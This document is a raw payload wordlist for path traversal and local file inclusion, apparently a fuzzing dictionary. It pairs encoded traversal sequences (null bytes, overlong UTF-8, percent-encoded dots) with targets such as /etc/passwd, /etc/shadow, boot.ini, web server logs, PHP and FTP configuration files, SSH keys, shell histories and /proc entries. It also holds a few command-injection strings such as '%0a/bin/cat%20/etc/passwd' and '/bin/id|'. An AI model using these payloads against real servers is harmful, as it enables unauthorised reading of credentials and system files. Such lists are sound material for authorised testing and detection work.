%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../conf/server.xml
../../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../logs/access.log
../../../../../logs/error.log
../../../../../usr/local/apache/logs/access.log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/error.log
../../../../../usr/local/apache/logs/error_log
../../../../../var/log/access_log
../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/error_log
../../../../../var/log/httpd/access_log
../../../../../var/log/httpd/error_log
../../../../../var/www/logs/access.log
../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../logs/access.log
../../../../logs/error.log
../../../apache/logs/access.log
../../../apache/logs/error.log
../../../logs/access.log
../../../logs/error.log
../../apache/logs/access.log
../../apache/logs/error.log
../../boot.ini
../../logs/access.log
../../logs/error.log
../apache/logs/access.log
../apache/logs/error.log
../logs/access.log
../logs/error.log
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
/../../../../../../../../../../../boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/../../var/www/logs/access_log
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././boot.ini
/./././././././././././etc/passwd
/./././././././././././etc/shadow
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
/NetServer\bin\stable\apache\php.ini
/PHP\php.ini
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\xampp\apache\conf\httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/WINDOWS\php.ini
/WINNT\php.ini
/apache/logs/access.log
/apache/logs/error.log
/apache2/logs/access.log
/apache2/logs/error.log
/apache\php\php.ini
/bin/php.ini
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/chrootUsers
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/apache
/etc/init.d/apache2
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/my.cnf
/etc/mysql/my.cnf
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/shadow
/etc/utmp
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home2\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/logs/access.log
/logs/error.log
/logs/pure-ftpd.log
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/php4\php.ini
/php5\php.ini
/php\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/self/cmdline
/proc/self/envron
/root/.Xauthority
/root/.bash_history
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/access_log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/error.log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/web/conf/php.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:\boot.ini
C:\inetpub\wwwroot\global.asa
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\System32\Inetsrv\metabase.xml
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\inetpub\wwwroot\index.asp
d:\System32\Inetsrv\metabase.xml
/var/log/mysqld.log
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hosts.allow
/etc/hosts.equiv
/etc/hosts.deny
/etc/ssh/sshd_config
/etc/apache/httpd.conf
/etc/resolv.conf
/var/log/message
/etc/inetd.conf
/etc/crontab
/etc/defaultdomain
/etc/rpc
/.rhosts
/.shosts
/.ssh/authorized_keys
/.bash_history
/.bash_profile
/.sh_history
/.profile
/.bashrc
/.logout
/.Xauthority
/.netrc
/.cshrc
/etc/hostname.hme0
/etc/hostname.pcn0
/etc/hostname.iprb0
/etc/hostname.qfe0
/etc/hostname.eri0
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.dmfe0
/etc/hostname.dnet0
/etc/hostname.elx0
/etc/hostname.elxl0
/etc/hostname.spwr0
/etc/hostname.eri0
/etc/hostname.ge0
/etc/hostname.ieef0
/etc/hostname.le0
/etc/hostname.dcelx0
/etc/hostname.ecn0
/etc/hostname.lo
/etc/hostname.hme1
/etc/hostname.pcn1
/etc/hostname.iprb1
/etc/hostname.qfe1
/etc/hostname.eri1
/etc/hostname.bge
/etc/hostname.ce1
/etc/hostname.dmfe1
/etc/hostname.dnet1
/etc/hostname.elx1
/etc/hostname.elxl1
/etc/hostname.spwr1
/etc/hostname.eri1
/etc/hostname.ge1
/etc/hostname.ieef1
/etc/hostname.le1
/etc/hostname.dcelx1
/etc/hostname.ecn1
/etc/hostname.lo
/etc/hostname.hme2
/etc/hostname.pcn2
/etc/hostname.iprb2
/etc/hostname.qfe2
/etc/hostname.eri2
/etc/hostname.bge
/etc/hostname.ce2
/etc/hostname.dmfe2
/etc/hostname.dnet2
/etc/hostname.elx2
/etc/hostname.elxl2
/etc/hostname.spwr2
/etc/hostname.eri2
/etc/hostname.ge2
/etc/hostname.ieef2
/etc/hostname.le2
/etc/hostname.dcelx2
/etc/hostname.ecn2
/etc/hostname.lo
/etc/hostname.hme3
/etc/hostname.pcn3
/etc/hostname.iprb3
/etc/hostname.qfe3
/etc/hostname.eri3
/etc/hostname.bge
/etc/hostname.ce3
/etc/hostname.dmfe3
/etc/hostname.dnet3
/etc/hostname.elx3
/etc/hostname.elxl3
/etc/hostname.spwr3
/etc/hostname.eri3
/etc/hostname.ge3
/etc/hostname.ieef3
/etc/hostname.le3
/etc/hostname.dcelx3
/etc/hostname.ecn3
/etc/hostname.lo
/etc/default/passwd
/etc/syslog.conf
/etc/syslogd.conf
/etc/release
/etc/motd
/etc/issue
/etc/group
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/etc/vfstab
/etc/system
/etc/defaultrouter
/var/adm/messages
/var/log/syslog
/var/adm/utmpx
/var/adm/loginlog
/var/adm/lastlog
/etc/netconfig
/var/log/authlog
/log/miscDir/accesslog
/etc/sudoers
/etc/httpd/conf/httpd.conf
/etc/make.conf
/etc/apt/sources.list
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hosts.allow
/etc/hosts.equiv
/etc/hosts.deny
/etc/ssh/sshd_config
/etc/apache/httpd.conf
/etc/resolv.conf
/var/log/messages
/var/log/dmesg
/etc/inetd.conf
/etc/crontab
/etc/defaultdomain
/etc/rpc
/.rhosts
/.shosts
/.ssh/authorized_keys
/.bash_history
/.bash_profile
/.sh_history
/.profile
/.bashrc
/.logout
/.Xauthority
/.netrc
/.forward
/.cshrc
/etc/default/passwd
/etc/syslog.conf
/etc/syslogd.conf
/etc/release
/etc/issue
/etc/motd
/etc/group
/etc/fstab
/etc/nsswitch.conf
/etc/vfstab
/etc/system
/var/log/syslog
/etc/netconfig
/var/log/authlog
/log/miscDir/accesslog
/etc/sudoers
/etc/updatedb.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/apache/error_log
/var/log/apache/access_log
/var/log/apache2/error_log
/var/log/apache2/access_log
/etc/logrotate.d/httpd
/var/run/httpd.pid
/proc/cpuinfo
/proc/version
/etc/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysql.ini
/etc/php.d/mysqli.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/my.cnf
/var/run/mysqld/mysqld.pid
/var/log/mysqld.log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/apache/logs/error_log
/apache/logs/access_log
/apache/logs/error.log
/apache/logs/access.log
/logs/error_log
/logs/access_log
/logs/error.log
/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/log/access_log
/var/log/error_log
/var/log/access.log
/var/log/error.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/apache2/logs/error_log
/apache2/logs/access_log
/apache2/logs/error.log
/apache2/logs/access.log
/var/lib/mlocate/mlocate.db
/proc/meminfo
/proc/net/route
/proc/net/tcp
/proc/net/arp
/proc/net/dev
/proc/partitions
/proc/mounts
/proc/loadavg
/boot/grub/grub.conf
/etc/mailman/mm_cfg.py
/etc/postfix/mydomains